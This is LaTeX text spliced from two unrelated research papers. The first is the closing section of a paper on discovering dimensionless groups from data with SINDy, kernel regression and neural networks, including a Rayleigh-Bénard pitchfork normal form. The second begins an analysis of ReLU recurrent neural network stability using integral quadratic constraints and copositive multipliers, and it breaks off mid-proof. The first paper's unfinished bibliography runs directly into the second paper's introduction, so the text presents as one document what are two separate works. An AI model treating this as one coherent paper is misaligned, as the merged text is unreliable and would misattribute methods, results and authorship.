One option for learning a model of the flow near the critical point would be to input the spatiotemporally varying data and learn a PDE model~\cite{rudy2017data}.
This might yield something similar to a Ginzburg-Landau or Swift-Hohenberg model~\cite{Cross1993}.
Another approach is to approximate some quantity of interest with a linear modal decomposition such as proper orthogonal decomposition and fit an ODE model of the temporal coefficients~\cite{Loiseau2017jfm}.
Given the simple globally coherent spatial structure of the flow, we proceed with the latter.
To account for translational invariance, we first represent the temperature field with a Fourier series in the $x$-direction:
\begin{equation}
T(x, z, t) = \sum_k \hat{T}_k(z, t) e^{ikx}.
\end{equation}
Recognizing that the weakly supercritical solution has only $k=\pm 2$ Fourier components (see Fig.~\ref{fig:sindy-RB}), we define a real-valued observable as the wall-normal integral of the negative temperature gradient (proportional to heat flux) at $k=2$:
\begin{equation}
q(t) = \left| \int_0^{L_z} -ik \hat{T}_2(z, t) \dd z \right|.
\end{equation}
Note that this choice is arbitrary; we could for instance model the coefficient of a particular Fourier-Chebyshev basis function, or that of a leading POD mode.
All would illustrate qualitatively similar behavior, but this definition of $q(t)$ is a simple and representative global observable.
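As a sketch of how $q(t)$ can be evaluated from a temperature snapshot (the grid layout, Fourier normalization, and quadrature rule below are our own assumptions):

```python
import cmath
import math

def heat_flux_observable(T, dz, k=2):
    """q = | sum_z (-i k) T_hat_k(z) dz | for one snapshot T[z][x],
    with T_hat_k the k-th discrete Fourier coefficient in x and a
    trapezoidal rule approximating the wall-normal integral."""
    Nx = len(T[0])
    q = 0j
    for iz, row in enumerate(T):
        # k-th Fourier coefficient: T(x) = sum_k T_hat_k e^{i k theta}
        Tk = sum(row[j] * cmath.exp(-2j * math.pi * k * j / Nx)
                 for j in range(Nx)) / Nx
        w = 0.5 if iz in (0, len(T) - 1) else 1.0  # trapezoidal end weights
        q += -1j * k * Tk * w * dz
    return abs(q)
```

For a synthetic field $T = \sin(\pi z)\cos(2\theta)$ the $k=2$ coefficient is $\tfrac12\sin(\pi z)$, so $q = 2/\pi$, which the sketch recovers.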
We set up the dimensionless SINDy problem as described in Sec.~\ref{sec:methods-sindy}.
Since we expect a Landau-type dynamics model for the symmetry-breaking behavior, we choose a linear-cubic polynomial library in $q$ and search for one dimensionless group $\pi_p$, along with an appropriate dimensionless time $\tau$.
Since there are only six independent dimensional quantities in this problem $(L_z, g, \alpha, \Delta T, \nu, \kappa)$, it is inexpensive to perform the optimization over all dimensionless numbers composed of integer powers up to $\pm 2$.
This has the advantage of producing a simple number suitable for comparison to the classical result, but is not strictly necessary; the brute force search could be avoided with a constrained optimization approach as described in Sec.~\ref{sec:constrained-opt} and the boundary layer example in Sec.~\ref{sec:results-blasius}.
The optimal dimensionless number selected by the algorithm is the inverse of the Rayleigh number, $\pi_p = \mathrm{Ra}^{-1}$, with dimensionless time $\tau = t \kappa^2 / \alpha^2 \nu (\Delta T)^2 $.
The dynamics model is a normal form for a pitchfork bifurcation:
\begin{equation}
\mathrm{Ra}\dv{q}{\tau} = \left(\frac{\mathrm{Ra}}{\mathrm{Ra}_c} - 1 \right) q - \mu q^3,
\end{equation}
with estimated critical Rayleigh number $\mathrm{Ra}_c \approx 1878$, growth rate $\lambda \approx 1.7 \times 10^{-3}$ and Landau parameter $\mu \approx 4.6\times 10^{-5}$.
The fixed points of this model can be found easily and compared to the steady states of the simulation, as shown in Fig.~\ref{fig:sindy-RB}.
The model closely matches the steady states not only of the training points, but also of the withheld test points much farther from the bifurcation (shown as red crosses).
Of course, this is a simple model of a well-understood instability, but the ability to directly derive normal forms from dimensional data opens the possibility of modeling more complex bifurcations, including cases where the control parameters are not well established.
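For reference, comparing the model to the steady states amounts to evaluating the nonzero fixed points $q^* = \pm\sqrt{(\mathrm{Ra}/\mathrm{Ra}_c-1)/\mu}$ above threshold; a minimal sketch with the coefficients estimated above:

```python
import math

def steady_amplitude(Ra, Ra_c=1878.0, mu=4.6e-5):
    """Stable steady-state amplitude of the identified pitchfork normal
    form Ra * dq/dtau = (Ra/Ra_c - 1) q - mu q**3."""
    r = Ra / Ra_c - 1.0
    return 0.0 if r <= 0.0 else math.sqrt(r / mu)
```

Below $\mathrm{Ra}_c$ the only fixed point is $q^*=0$; above it, the amplitude grows as the square root of the supercriticality, as in Fig.~\ref{fig:sindy-RB}.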
\section{Discussion}
Finally, we have shown that data can be used to discover an ``optimal'' set of dimensionless numbers that honor the Buckingham Pi theorem according to Hypothesis~\ref{main-hyp}.
However, the definition of that optimality is non-unique, leaving the open question of how to find the best way to integrate the data with the Buckingham Pi theorem.
In particular, the methods introduced in Sec.~\ref{sec:methods} all seek to identify dimensionless groups for which the corresponding function approximation (KRR, BuckiNet, or SINDy) can best represent the input-output relationship $\bm \pi_q = \psi(\bm \pi_p)$.
Choosing a SINDy representation of this relationship encodes an inductive bias towards low-order polynomials, which is often appropriate in dynamical systems applications or asymptotic expansions.
In these contexts, the identified parameters are more likely to have a familiar structure, such as the ratio of different terms in a governing equation.
On the other hand, the optimal dimensionless parameters as seen by more flexible and general representations, such as neural networks or kernel regression, may be completely different from those derived by classical analytic approaches, giving insight into scaling Pi-groups that cannot be derived by hand.
For instance, the Blasius solution cannot be easily represented with low-order polynomials, but at the cost of interpretability of the function, kernel regression is able to accurately model the boundary layer with the nonstandard nondimensionalization in equation~\eqref{eq:blasius-result}.
More generally, dimensional analysis is a commonly used method for physics discovery and characterization. Importantly, it highlights the fact that physical laws do not depend on any specific units of measurement. Rather, physical laws are fundamental and have the property of {\em generalized homogeneity}~\cite{barenblatt1996scaling}; thus they are independent of the observer. Advancements across scientific disciplines have used such concepts to develop governing equations, from gravitation to electromagnetism. Specifically, dimensional analysis has identified critical symmetries, parametrizations, and bifurcation structures underlying a given model. As such, it has always been a critical component of establishing the canonical models across disciplines. However, when encountering new physical systems where the governing equations are unknown or their parametrizations undetermined, dimensional analysis is once again critical for determining {\em the general form to which any physical equation is reducible}~\cite{buckingham1914physically}.
Edgar Buckingham provided the rigorous mathematical foundations on which dimensional analysis is accomplished. It is a constructive procedure which significantly constrains the space of hypothesized models. Although it greatly constrains the allowable model space, Buckingham Pi theory does not produce a unique model, but rather a small subset of parametrizations which are then typically chosen from expert knowledge or asymptotic considerations~\cite{barenblatt1996scaling}. With modern machine learning, we have shown that the Buckingham Pi procedure can be automated to discover a diversity of important physical features and properties. In particular, we have shown that, depending on the objective, there are three distinct methods by which we can produce a model through dimensional analysis. Each method is framed as an optimization problem which imposes hard, soft, or no constraints on the nullspace of the units matrix, and optimizes the robustness, accuracy, and speed of the model selected. Specifically, we develop three data-driven techniques that use the Buckingham Pi theorem as a constraint: (i) a constrained optimization problem with a non-parametric input-output fitting function, (ii) a deep learning algorithm (BuckiNet) that projects the input parameter space to a lower dimension in the first layer, and (iii) a sparse identification of nonlinear dynamics (SINDy) based technique to discover dimensionless equations whose coefficients determine important features of the dynamics, such as inertia and bifurcations. Such regularizations resolve the ill-posed nature of Buckingham Pi theory and its non-unique solution space. We demonstrated the application of each method on a set of well-known physics problems, showing that without any prior knowledge of the underlying physics, the various architectures are able to extract all the key concepts from the data alone.
The suite of algorithms introduced provides a set of physics-informed learning tools that can help characterize new systems and the underlying general form to which a physical system is reducible, regardless of whether the governing equations are known. This includes extracting, in an automated fashion, the system's symmetries, parametric dependencies, and potential bifurcation parameters. Although modern machine learning can simply learn accurate representations of input-output relations, the imposition of Buckingham Pi theory allows for interpretable or explainable models. Explainable AI, especially in the context of physics-based systems, has grown in importance, as it is imperative to understand the feature space on which modern AI-empowered autonomy makes decisions with guaranteed safety margins.
\section*{Acknowledgments}
The authors acknowledge support from the Army Research Office (ARO W911NF-19-1-0045) and the National Science Foundation AI Institute in Dynamic Systems (Grant No. 2112085).
JLC acknowledges funding support from the Department of Defense (DoD) through the National Defense Science \& Engineering Graduate (NDSEG) Fellowship Program.
\begin{spacing}{.9}
\small{
\setlength{\bibsep}{5.5pt}
\bibliographystyle{unsrt}
\section{Introduction}
\label{sec:intro}
A recurrent neural network (RNN) is a class of deep neural networks
that is able to imitate the behavior of dynamical systems
thanks to its feedback mechanism.
The effectiveness of the RNN is widely recognized in speech recognition,
natural language processing, and image recognition
\cite{Barabanov_IEEENN2002,Zhang_IEEENN2014,Salehinejad_2018}.
Even though new architectures such as the transformer \cite{Vaswani_NIPS2017}
have been developed recently, the RNN is expected
to retain its position
as one of the fundamental and important elements in deep neural networks.
Even though the feedback mechanism is the key feature of the RNN
and distinguishes the RNN from feedforward networks,
its existence may cause network instability.
Therefore the stability analysis of the RNN has been an important issue
in the machine learning community
\cite{Barabanov_IEEENN2002,Zhang_IEEENN2014,Salehinejad_2018}.
From control theoretic viewpoint,
we can readily apply the small gain theorem \cite{Khalil_2002}
to the stability analysis of a given RNN by representing it
as a feedback connection with a linear time-invariant (LTI) system and
a static nonlinear activation function typically being
a rectified linear unit (ReLU) for the RNN.
It is nonetheless true that the standard small gain theorem leads to
conservative results
since it does not take into account the important property that
the ReLU returns only nonnegative signals.
This motivated us to analyze the $l_2$ induced norm of LTI systems
for nonnegative input signals in \cite{Ebihara_EJC2021},
which is referred to as the $l_{2+}$ induced norm in this paper.
We characterized an upper bound of
the $l_{2+}$ induced norm
by copositive programming \cite{Dur_2010}, and then
derived a numerically tractable semidefinite program (SDP)
for (in general loosened) upper bound computation.
We finally derived an $l_{2+}$-induced-norm-based
(scaled) small gain theorem for the stability analysis of the RNN and
illustrated its effectiveness by numerical examples.
We believe that the treatments in \cite{Ebihara_EJC2021}
brought some new insights for the stability analysis of
feedback systems constructed from LTI systems and
nonlinear elements (i.e., Lur'e systems).
However, the $l_{2+}$-induced-norm-based (scaled) small gain condition
may still be conservative in view of
the advanced integral quadratic constraint (IQC) theory \cite{Megretski_IEEE1997}.
We acknowledge the fact that, for the stability analysis of Lur'e systems,
the effectiveness of
the IQC-based approaches with Zames-Falb multipliers \cite{Zames_SIAM1968}
are widely recognized, see, e.g., \cite{Fetzler_IFAC2017,Fetzler_IJRN2017}.
Therefore it is strongly preferable if we can build the nonnegativity-based approach
upon the powerful IQC-based framework.
Such an extension seems hard since, as the name IQC suggests,
the existing multipliers capture the properties of nonlinear elements
with {\it quadratic} constraints on their input-output signals,
whereas the nonnegativity property of the RNN (i.e., ReLU) is essentially
{\it linear} constraints on the input-output signals.
To get around this difficulty,
we loosen the standard positive semidefinite cone to the copositive cone
and employ copositive multipliers to handle
the linear (nonnegativity) constraints on the input-output signals of the RNN.
As clarified later on, this can be done in such a sound way that
the proposed IQC-based stability condition with the copositive multipliers
encompasses the results in \cite{Ebihara_EJC2021} as particular cases.
Then, by applying an inner approximation to the copositive cone,
we derive numerically tractable IQC-based SDPs for the stability analysis of the RNN.
We show that, within the framework of IQC,
we can employ copositive multipliers (or their inner approximation)
together with existing multipliers such as
the Zames-Falb multipliers and polytopic bounding multipliers,
and this directly enables us to ensure that the introduction of
the copositive multipliers leads to better (no more conservative) results.
We finally illustrate the effectiveness of
the IQC-based stability conditions with the copositive multipliers
by using the same numerical examples as in \cite{Ebihara_EJC2021}.
Related works include \cite{Anderson_IEEENN2007,Yin_IEEE2021,Fazlyab_IEEE2021,Revay_LCSS2021}, but
again the novel contribution of the present paper is
capturing the behavior of ReLUs by
copositive multipliers within the framework of IQCs.
Notation:
The set of $n\times m$ real matrices is denoted by $\bbR^{n\times m}$, and
the set of $n\times m$ entrywise nonnegative matrices is denoted
by $\bbR_+^{n\times m}$.
For a matrix $A$, we also write $A\geq 0$ to denote that
$A$ is entrywise nonnegative.
We denote the set of $n\times n$ real symmetric matrices by $\bbS^n$.
For $A\in\bbS^n$, we write $A\succ 0\ (A\prec 0)$ to
denote that $A$ is positive (negative) definite.
For $A\in\bbR^{n\times n}$, we define $\He\{A\}:=A+A^T$.
For $A\in\bbR^{n\times n}$ and $B\in\bbR^{n\times m}$,
$(\ast)^TAB$ is a shorthand notation of $B^TAB$.
We denote by $\bbD_{++}^n\subset\bbR^{n\times n}$ the set of diagonal matrices
with strictly positive diagonal entries.
In addition, we denote by $\bbD^n[\alpha,\beta]$
the set of diagonal matrices whose diagonal entries are all within
the closed interval $[\alpha,\beta]$.
Moreover, $\bbD_\mathrm{ver}^n[\alpha,\beta]\subset \bbD^n[\alpha,\beta]$
is the set of $2^n$ matrices corresponding to the vertices of $\bbD^n[\alpha,\beta]$.
A matrix $M\in\bbR^{n\times n}$ is said to be
Z-matrix if $M_{ij}\le 0$ for all $i\neq j$.
Moreover, $M$ is said to be doubly hyperdominant if
it is a Z-matrix and
$M \one_n \ge 0$, $\one_n^T M \ge 0$,
where $\one_n\in\bbR^n$ stands for the all-ones-vector.
In this paper we denote by $\DHD^n\subset \bbR^{n\times n}$ the set of
doubly hyperdominant matrices.
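Membership in $\DHD^n$ is easy to verify directly from the definition; a minimal sketch with matrices as nested lists:

```python
def is_doubly_hyperdominant(M, tol=1e-12):
    """Check that M is a Z-matrix (nonpositive off-diagonal entries)
    with nonnegative row sums (M 1 >= 0) and column sums (1^T M >= 0)."""
    n = len(M)
    if any(M[i][j] > tol for i in range(n) for j in range(n) if i != j):
        return False  # not a Z-matrix
    rows_ok = all(sum(M[i]) >= -tol for i in range(n))
    cols_ok = all(sum(M[i][j] for i in range(n)) >= -tol for j in range(n))
    return rows_ok and cols_ok
```

For example, the identity and $\left[\begin{smallmatrix}2&-1\\-1&2\end{smallmatrix}\right]$ are doubly hyperdominant, while a Z-matrix with a negative row sum is not.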
For the discrete-time signal $w$ defined
over the time interval $[0,\infty)$, we define
\[
\begin{array}{@{}l}
\|w\|_{2}:=\sqrt{\sum_{k=0}^{\infty}|w(k)|_2^2}
\end{array}
\]
where for $v\in\bbR^{n_v}$ we define
$|v|_2:=\sqrt{\sum_{j=1}^{n_v} v_j^2}$.
We also define
\[
\begin{array}{@{}l}
l_{2} :=\left\{w:\ \|w\|_{2}<\infty \right\},\\
l_{2+} :=\left\{w:\ w\in l_{2},\ w(k)\ge 0\ (\forall k\ge 0)\right\}
\end{array}
\]
and
\[
\begin{array}{@{}l}
l_{2e} :=\left\{w:\ w_\tau\in l_2,\ \forall \tau\in[0,\infty) \right\}
\end{array}
\]
where $w_\tau$ is the truncation of the signal $w$ up to the time instant
$\tau$
and defined by
\[
w_\tau(k)=
\left\{
\begin{array}{cc}
w(k)& (k\le \tau), \\
0& (k> \tau). \\
\end{array}
\right.
\]
For an operator $H:\ l_{2e}\ni w \to z \in l_{2e}$,
we define its (standard) $l_2$ induced norm by
\begin{equation}
\|H\|_{2}:=\sup_{w\in l_2,\ \|w\|_2=1} \ \|z\|_2.
\label{eq:l2norm}
\end{equation}
We also define
\begin{equation}
\|H\|_{2+}:=\sup_{w\in l_{2+},\ \|w\|_2=1} \ \|z\|_2.
\label{eq:l2+norm}
\end{equation}
This is a variant of the $l_2$ induced norm introduced in \cite{Ebihara_EJC2021}
and referred to as the $l_{2+}$ induced norm in this paper.
We can readily see that $\|H\|_{2+}\le \|H\|_{2}$.
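The gap between the two norms can be strict even for memoryless maps: for the static map $w\mapsto w_1-w_2$ we have $\|H\|_2=\sqrt 2$ but $\|H\|_{2+}=1$, since the worst-case input $(1,-1)/\sqrt 2$ is not nonnegative. A grid-search sketch over the unit sphere (our own toy example):

```python
import math

def gains(a, b, n=20001):
    """Compare sup |a w1 + b w2| over unit vectors w (l2 gain) with the
    supremum over the nonnegative quarter of the circle (l2+ gain)."""
    g2 = g2p = 0.0
    for i in range(n):
        th = 2.0 * math.pi * i / n
        v = abs(a * math.cos(th) + b * math.sin(th))
        g2 = max(g2, v)
        if th <= math.pi / 2:  # w1, w2 >= 0
            g2p = max(g2p, v)
    return g2, g2p

g2, g2p = gains(1.0, -1.0)  # the map H w = w1 - w2
```

The restriction to nonnegative inputs is exactly what the copositive machinery of the later sections exploits.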
\section{Copositive Programming}
\label{sec:cop}
Copositive programming (COP) is a convex optimization problem in which
we minimize a linear
objective function over the
linear matrix inequality (LMI) constraints on the copositive cone
\cite{Dur_2010}.
In this section, we summarize its basics.
\subsection{Convex Cones Related to COP}
Let us review the definition and the property of convex
cones related to COP.
\begin{definition}\cite{Berman_2003}\label{conedef}
The proper cones
$\PSD_n$, $\COP_n$, $\CP_n$, $\NN_n$, and $\DNN_n$ in
$\bbS^n$ are defined as follows.
\begin{enumerate}
\item
$\PSD_n:=\{P\in\bbS^n:\ \forall x\in\bbR^n,\
x^TPx\geq 0\}=\{P\in\bbS^n:\ \exists B\
\mbox{s.t.}\ P=BB^T\}$ is called {\it the positive semidefinite cone}.
\item
$\COP_n:=\{P\in\bbS^n:\ \forall x\in\bbR_{+}^n,\
x^TPx\geq 0\}$ is called {\it the copositive cone}.
\item
$\CP_n:=\{P\in\bbS^n:\ \exists B\ge 0\
\mbox{s.t.}\ P=BB^T\}$ is called {\it the completely positive cone}.
\item
$\NN_n:=
\{P\in\bbS^n:\ P\geq 0\}
$
is called {\it the nonnegative cone}.
\item
$\PSD_n+\NN_n:=\{P+Q:\ P\in\PSD_n,\
Q\in\NN_n\}$.
This is the Minkowski sum of the positive semidefinite cone and
the nonnegative cone.
\item
$\DNN_n:=\PSD_n\cap\NN_n$ is called
{\it the doubly nonnegative cone}.
\end{enumerate}
\end{definition}
From Definition \ref{conedef},
we clearly see that the following inclusion relationships hold:
\begin{equation}
\CP_n\subset\DNN_n\subset\PSD_n\subset\PSD_n+\NN_n\subset\COP_n,
\label{eq:inc1}
\end{equation}
\begin{equation}
\CP_n\subset\DNN_n\subset\NN_n\subset\PSD_n+\NN_n\subset\COP_n.
\label{eq:inc2}
\end{equation}
In particular, when $n\leq 4$, it is known that
$\COP_n=\PSD_n
+\NN_n$ and $\CP_n =\DNN_n$ hold \cite{Berman_2003}.
On the other hand, as for the duality of these cones,
$\COP_n$ and $\CP_n$ are dual to each other,
$\PSD_n+\NN_n$ and $\DNN_n$ are dual to each other,
and $\PSD_n$ and $\NN_n$ are self-dual.
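In the $2\times 2$ case, membership in these cones can be checked in closed form: $P\in\COP_2$ if and only if $p_{11}\ge 0$, $p_{22}\ge 0$, and $p_{12}+\sqrt{p_{11}p_{22}}\ge 0$, consistent with $\COP_2=\PSD_2+\NN_2$. A minimal sketch illustrating the inclusions \eqref{eq:inc1} and \eqref{eq:inc2}:

```python
import math

def is_psd_2x2(P):
    """P in PSD_2: nonnegative diagonal entries and determinant."""
    return (P[0][0] >= 0 and P[1][1] >= 0
            and P[0][0] * P[1][1] - P[0][1] ** 2 >= 0)

def is_nn(P):
    """P in NN_2: entrywise nonnegative."""
    return all(e >= 0 for row in P for e in row)

def is_cop_2x2(P):
    """P in COP_2 via the closed-form 2x2 copositivity test."""
    if P[0][0] < 0 or P[1][1] < 0:
        return False
    return P[0][1] + math.sqrt(P[0][0] * P[1][1]) >= 0
```

For example, $\left[\begin{smallmatrix}1&2\\2&1\end{smallmatrix}\right]$ is in $\NN_2$ but not $\PSD_2$, while $\left[\begin{smallmatrix}1&-1\\-1&1\end{smallmatrix}\right]$ is in $\PSD_2$ but not $\NN_2$; both are copositive.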
It is also well known that the interior of the cone $\PSD_n$ can be
characterized by
\[
\begin{array}{@{}lcl}
\PSD_n^\circ&=&\{P\in\bbS^n:\ \forall
x\in\bbR^n\backslash\{0\},\ x^TPx>0\}\\
&=&
\{P\in\bbS^n:\ \exists B\ \mbox{s.t.}\ P=BB^T,\
\mathrm{rank}(B)=n\}.
\end{array}
\]
\subsection{Basic Properties of COP}
COP is a convex optimization problem on the copositive cone and
its dual is a convex optimization problem on the completely positive cone.
As mentioned in \cite{Dur_2010},
the problem of determining whether a given symmetric matrix is
copositive is a co-NP-complete problem, and
the problem of determining whether a given symmetric matrix is
completely positive is an NP-hard problem.
Therefore, it is in general hard to solve COPs
numerically.
However, since the problem of determining whether a given matrix is in $\PSD_n+\NN_n$
or in $\DNN_n$ can readily be reduced to an SDP,
we can easily solve convex optimization problems on the cones
$\PSD_n+\NN_n$ and $\DNN_n$ numerically.
Moreover, when $n\leq 4$, it is known that $\COP_n=\PSD_n+\NN_n$ and
$\CP_n=\DNN_n$ as stated above,
and hence those COPs with $n\leq 4$ can be reduced to SDPs.
\section{IQC-Based Stability Analysis of RNN with ReLU}
\label{sec:RNN}
\subsection{Basics of RNN and Stability}
\label{sub:RNN}
Let us consider the dynamics of
the discrete-time RNNs typically described by
\begin{equation}
G:\ \left\{
\arraycolsep=0.5mm
\begin{array}{ccl}
x(k+1)&=&\Lambda x(k)+\Win w(k)+v(k),\\
z(k)&=&\Wout x(k),\\
w(k)&=&\Phi(z(k)+s(k)).
\end{array}
\right.
\label{eq:RNN}
\end{equation}
Here $x\in\bbR^n$ is the state and
$\Lambda\in\bbR^{n\times n}$,
$\Wout\in\bbR^{m\times n}$,
$\Win\in\bbR^{n\times m}$ are constant matrices
with $\Lambda$ being Schur-Cohn stable.
We assume $x(0)=0$.
On the other hand, note that
$s:\ [0,\infty)\to \bbR^m$ and $v:\ [0,\infty)\to \bbR^n$ are
external input signals
and $\Phi:\ \bbR^m\to \bbR^m$ is the
static activation function typically being nonlinear.
The matrices $\Win$ and $\Wout$ are constructed from
the weightings of the edges in RNN.
In this paper, we consider the typical case where the activation function is
the (entrywise)
rectified linear unit (ReLU) whose input-output property is given by
\begin{equation}
\begin{array}{@{}l}
\Phi(\xi)=\left[\ \phi(\xi_1)\ \cdots\ \phi(\xi_m)\ \right]^T,\\
\phi: \bbR\to \bbR,\quad
\phi(\eta)=
\left\{
\begin{array}{cc}
\eta & (\eta\ge 0), \\
0 & (\eta< 0). \\
\end{array}
\right.
\end{array}
\label{eq:ReLU}
\end{equation}
We can readily see that $\|\Phi\|_2=1$.
It should be noted that
the system $G_0$
essentially forms a feedback loop with
the ReLU $\Phi$ where
\begin{equation}
G_0:=
\left[
\begin{array}{c|c}
\Lambda & \Win \\ \hline
\Wout & 0
\end{array}
\right].
\label{eq:G0}
\end{equation}
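To make the feedback structure concrete, the recursion \eqref{eq:RNN} with the ReLU \eqref{eq:ReLU} can be simulated directly. A minimal sketch with matrices as nested lists (the scalar example weights used below are our own toy choice):

```python
def relu(v):
    """Entrywise rectified linear unit."""
    return [max(e, 0.0) for e in v]

def simulate_rnn(Lam, Win, Wout, s, v, T):
    """Simulate x(k+1) = Lam x(k) + Win w(k) + v(k), z(k) = Wout x(k),
    w(k) = relu(z(k) + s(k)) from x(0) = 0 for T steps."""
    n, m = len(Lam), len(Wout)
    x = [0.0] * n
    zs, ws = [], []
    for k in range(T):
        z = [sum(Wout[i][j] * x[j] for j in range(n)) for i in range(m)]
        w = relu([z[i] + s[k][i] for i in range(m)])
        x = [sum(Lam[i][j] * x[j] for j in range(n))
             + sum(Win[i][j] * w[j] for j in range(m))
             + v[k][i] for i in range(n)]
        zs.append(z)
        ws.append(w)
    return zs, ws
```

For instance, with the scalar choice $\Lambda=\Win=\Wout=0.5$ and an impulse in $s$, the loop responds with $w(0)=1$ and a geometrically decaying $z(k)$.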
Since here we are dealing with nonlinear systems,
it is of prime importance to clarify the definition of
``stability.''
The definition we employ for the analysis of RNN is as follows.
\begin{definition}\cite{Khalil_2002} (Finite Gain $l_2$ Stability)
An operator $H:\ l_{2e}\ni u \to y\in l_{2e}$
is said to be finite gain $l_2$ stable
if there exists a nonnegative constant $\gamma$ such that
$\|y_\tau\|_2 \le \gamma \|u_\tau\|_2$ holds
for any $u \in l_{2e}$ and $\tau \in [0,\infty)$.
\end{definition}
In the following, we analyze the
finite gain $l_2$ stability of the operator in RNN
with respect to
the input $[\ s^T\ v^T\ ]^T\in l_{2e}$
and the output $[\ z^T\ w^T\ ]^T \in l_{2e}$.
Note that the feedback connection in the RNN
is well-posed since its dynamics is given by the state-space equation
\rec{eq:RNN}.
We also note that we implicitly use the causality of $G$ and $\Phi$
in the following.
\subsection{IQC-Based Basic Stability Condition}
It is known that the framework of
Integral Quadratic Constraint (IQC) \cite{Megretski_IEEE1997} is helpful
in capturing the nonlinearity in feedback systems and
obtaining less conservative results for stability analysis.
The basic IQC-based stability condition
for RNN with ReLU can be summarized by the next theorem.
\begin{theorem}
For any input signal $\xi\in l_{2e}$ and
output signal $\zeta\in l_{2e}$
of the ReLU $\Phi$ such that $\zeta=\Phi \xi$,
suppose $\Pi\in\bbS^{2m}$ satisfies
the time-domain
(discrete-time version of the) IQC given by
\begin{equation}
\sum_{k=0}^\tau
\left[
\begin{array}{c}
\xi(k) \\
\zeta(k) \\
\end{array}
\right]^T
\Pi
\left[
\begin{array}{c}
\xi(k) \\
\zeta(k) \\
\end{array}
\right]\ge 0
\label{eq:IQC0}
\end{equation}
for any $\tau\in[0,\infty)$.
Then, the RNN given by \rec{eq:RNN}
with ReLU $\Phi$ given by \rec{eq:ReLU}
is finite-gain $l_2$ stable if there exist
$P\in\PSD_n$ and
$S\in\bbD_{++}^m$ such that
\begin{equation}
\scalebox{0.95}{$
\begin{array}{@{}l}
\left[
\begin{array}{cc}
-P & 0 \\
0 & -S
\end{array}
\right]+
\left[
\begin{array}{cc}
\Lambda & \Win \\
\Wout & 0\\
\end{array}
\right]^T
\left[
\begin{array}{cc}
P & 0\\
0 & S\\
\end{array}
\right]
\left[
\begin{array}{cc}
\Lambda & \Win \\
\Wout & 0\\
\end{array}
\right]\\
\hspace*{5mm}
+
\left[
\begin{array}{cc}
\Wout & 0 \\
0 & I_m \\
\end{array}
\right]^T\Pi
\left[
\begin{array}{cc}
\Wout & 0 \\
0 & I_m \\
\end{array}
\right]
\prec 0.
\end{array}$}
\label{eq:RNNIQC}
\end{equation}
\label{th:IQC}
\end{theorem}
\begin{proofof}{\rth{th:IQC}}
Suppose \rec{eq:RNNIQC} holds with
$P=\hatP\in \PSD_n$ and
$S=\hatS\in \bbD_{++}^m$.
Then, it is very clear that there exist
$\varepsilon>0$ and $\nu>0$ such that
\[
\scalebox{0.95}{$
\begin{array}{@{}l}
M(\hatP,\varepsilon,\nu)\prec 0,\ \mbox{with}\\
M(\hatP,\varepsilon,\nu):=
\arraycolsep=0.3mm
\left[
\begin{array}{cccc}
-\hatP+\varepsilon^2 \Wout^T\Wout & 0 & 0 & 0 \\
0 & -\hatS & 0 & 0 \\
0 & 0 & -\nu^2 I_n& 0 \\
0 & 0 & 0 &-\nu^2 I_m \\
\end{array}
\right]\\
\arraycolsep=0.3mm
+(\ast)^T
\left[
\begin{array}{cc}
\hatP & 0\\
0 & \hatS\\
\end{array}
\right]
\left[
\begin{array}{cccc}
\Lambda & \Win & I_n & 0 \\
\Wout & 0 & 0 & I_m\\
\end{array}
\right]
+(\ast)^T
\Pi
\left[
\begin{array}{cccc}
\Wout & 0 & 0 & I_m \\
0 & I_m & 0 & 0 \\
\end{array}
\right].
\end{array}$}
\]
Then, along the trajectory of the RNN
for the input signals $v\in l_{2e}$ and $s\in l_{2e}$,
we have
\[
\left[
\begin{array}{c}
x(k)\\
w(k)\\
v(k)\\
s(k)\\
\end{array}
\right]^T
M(\hatP,\varepsilon,\nu)
\left[
\begin{array}{c}
x(k)\\
w(k)\\
v(k)\\
s(k)\\
\end{array}
\right]
\le 0\ (k=0,1,\cdots)
\]
or equivalently,
\[
\begin{array}{@{}l}
\varepsilon^2 z(k)^Tz(k)-x(k)^T\hatP x(k)+x(k+1)^T\hatP x(k+1)\\
+(z(k)+s(k))^T\hatS(z(k)+s(k))-w(k)^T\hatS w(k)\\
-\nu^2 v(k)^Tv(k)-\nu^2 s(k)^Ts(k)\\
+\left[
\begin{array}{c}
z(k)+s(k) \\
w(k) \\
\end{array}
\right]^T
\Pi
\left[
\begin{array}{c}
z(k)+s(k) \\
w(k) \\
\end{array}
\right] \le 0\\
(k=0,1,\cdots).
\end{array}
\]
Here, since $\|\Phi\|_2 = 1$ and $\hatS\in\bbD_{++}^m$, we have
\[
(z(k)+s(k))^T\hatS (z(k)+s(k))-w(k)^T\hatS w(k)\ge 0
\]
and hence
\[
\begin{array}{@{}l}
\varepsilon^2 z(k)^Tz(k)-x(k)^T\hatP x(k)+x(k+1)^T\hatP x(k+1)\\
-\nu^2 v(k)^Tv(k)-\nu^2 s(k)^Ts(k)\\
+
\left[
\begin{array}{c}
z(k)+s(k) \\
w(k) \\
\end{array}
\right]^T
\Pi
\left[
\begin{array}{c}
z(k)+s(k) \\
w(k) \\
\end{array}
\right] \le 0\\
(k=0,1,\cdots).
\end{array}
\]
Summing the above inequality from $k=0$ to $k=\tau$,
we obtain
\[
\scalebox{0.82}{$
\begin{array}{@{}l}
x(\tau+1)^T\hatP x(\tau+1)
+\varepsilon^2\sum_{k=0}^\tau |z(k)|_2^2
-\nu^2 \left(\sum_{k=0}^\tau |v(k)|_2^2+ \sum_{k=0}^\tau |s(k)|_2^2\right)\\
\renewcommand{\arraystretch}{0.90}
+ \sum_{k=0}^\tau
\left[
\begin{array}{c}
z(k)+s(k) \\
w(k) \\
\end{array}
\right]^T
\Pi
\left[
\begin{array}{c}
z(k)+s(k) \\
w(k) \\
\end{array}
\right] \le 0.
\end{array}$}
\]
Since $\hatP\in\PSD_n$ and since \rec{eq:IQC0} holds,
we can readily conclude from the above inequality that
\[
\|z_\tau\|_2^2 \le \frac{\nu^2}{\varepsilon^2}
\left(\|v_\tau\|_2^2+ \|s_\tau\|_2^2 \right)
\]
or equivalently,
\[
\renewcommand{\arraystretch}{0.90}
\|z_\tau\|_2 \le \frac{\nu}{\varepsilon}
\left\|
\left[
\begin{array}{c}
s_\tau\\
v_\tau
\end{array}\right]
\right\|_2.
\]
With this inequality and
\[
\renewcommand{\arraystretch}{0.95}
\begin{array}{@{}lcl}
\|w_\tau\|_{2} &=& \|(\Phi (z+s))_\tau\|_2\\
&=& \|\Phi (z+s)_\tau\|_2\\
&\le& \|\Phi\|_2 (\|z_\tau\|_2+\|s_\tau\|_2)\\
&=& \|z_\tau\|_2+\|s_\tau\|_2,
\end{array}
\]
we arrive at the conclusion that
\[
\begin{array}{@{}lcl}
